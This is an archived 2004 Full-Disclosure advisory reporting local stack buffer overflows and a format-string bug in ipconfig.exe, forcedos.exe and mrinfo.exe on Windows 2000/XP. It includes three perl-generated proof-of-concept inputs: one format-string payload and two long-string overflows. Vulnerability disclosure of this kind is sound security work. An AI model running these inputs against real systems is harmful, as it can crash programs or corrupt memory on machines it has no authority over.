[Full-Disclosure] Microsoft Windows cmd line tools BOFs

From: Martin Eiszner (m.eiszner_at_sec-consult.com)
Date: 11/17/04

  • Next message: Rob klein Gunnewiek: "Re: [Full-Disclosure] question regarding CAN-2004-0930"
    To: full-disclosure@lists.netsys.com
    Date: Wed, 17 Nov 2004 09:02:36 +0100
    
    

    ========================================
    Microsoft commandline tools BOF s
    ========================================

    Product: Windows-2000 SP4 / Windows-XP SP2

    Vulnerablities:

    - Buffer Overflow (no privilege escalation)

    Vendor: Microsoft (http://www.microsoft.com/)
    Vendor-Status: vendor contacted (between 2002 and 2003)
    Vendor-Patches: ipconfig (XP-SP 2) / forcedos.exe and mrinfo.exe not available

    Objects: ipconfig.exe / forcedos.exe / mrinfo.exe

    Exploitable:
    Local: PARTIAL
    Remote: NO

    ============
    Introduction
    ============

    ---
    =====================
    Vulnerability Details
    =====================
    1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY
    =======================================================
    OBJECTS:
    ipconfig.exe (only Windows-2000 SP4)
    forcedos.exe
    mrinfo.exe
    DESCRIPTION:
    Insufficient input-validation leads to a) stack based bufferoverflows and b) format string- vulnerabilites.
    EXAMPLES:
    a) ipconfig.exe /`perl -e 'print "PAAAA\x44\x33\x22\x11","%08x"x13,"%n";'`
    b) forcedos.exe `perl -e 'print "A"x6784;'`
    c) mrinfo.exe -i `perl -e 'print "A"x60;'`
    ===============
    GENERAL REMARKS
    ===============
    Find related postings regarding this issue here: (http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html).
    It is unlikely you to gain access or elevate priviledges thru "forcedos.exe" and "mrinfo.exe".
    Nevertheless it might be possible to misuse "ipconfig.exe" in an "restricted" environment with DHCP enabled !!
    ====================
    Recommended Hotfixes
    ====================
    ---
    EOF @2003 Brereton_paul@btinternet.com,m.eiszner@sec-consult.com
    =======
    Contact
    =======
    SEC-CONSULT
    UK / EUROPE
    Austria / EUROPE
    Brereton_paul@btinternet.com
    m.eiszner@sec-consult.com
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    

  • Next message: Rob klein Gunnewiek: "Re: [Full-Disclosure] question regarding CAN-2004-0930"

    Relevant Pages

    • [NEWS] Multiple Vulnerabilities in Oracle Database Server (40 Issues)
      ... Multiple buffer overflow and denial of service vulnerabilities exist ... DBMS_REPCAT_INSTANTIATE package ... To reproduce the overflow, execute the next PL/SQL: ... Oracle database user can exploit this vulnerability. ...
      (Securiteam)
    • iDEFENSE OSF1/Tru64 3.x vuln clarification
      ... VU#510235 - dtsession vulnerable to buffer overflow via long string of ... characters supplied as "-contextDir" command line argument ... > - the type of vulnerability ...
      (Bugtraq)
    • [Full-Disclosure] iDEFENSE OSF1/Tru64 3.x vuln clarification
      ... VU#510235 - dtsession vulnerable to buffer overflow via long string of ... characters supplied as "-contextDir" command line argument ... > - the type of vulnerability ...
      (Full-Disclosure)
    • [Full-disclosure] CVE-2008-5557 - PHP mbstring buffer overflow vulnerability
      ... CVE-2008-5557 - PHP mbstring buffer overflow vulnerability ... 4.3.0 and later versions including PHP 5 ... A heap buffer overflow was found in mbstring extension that is ... The vulnerability occurs in the part of the encoding conversion facility ...
      (Full-Disclosure)
    • SYMANTEC SECURITY ADVISORIES
      ... Microsoft Windows ASN.1 Library Integer Handling Vulnerability ... Microsoft ISA Server 2000 H.323 Filter Remote Buffer Overflow ... Linux Kernel do_mremap Function Boundary Condition Vulnerability ...
      (alt.computer.security)